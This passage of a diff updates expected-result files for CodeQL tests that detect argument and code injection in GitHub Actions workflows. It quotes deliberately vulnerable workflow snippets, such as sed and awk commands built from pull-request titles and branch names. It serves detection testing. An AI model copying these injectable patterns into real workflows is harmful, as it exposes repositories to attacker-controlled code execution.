controlled by an external user. | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4a2950d84ae9..dad99f0029a2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -613,154 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | 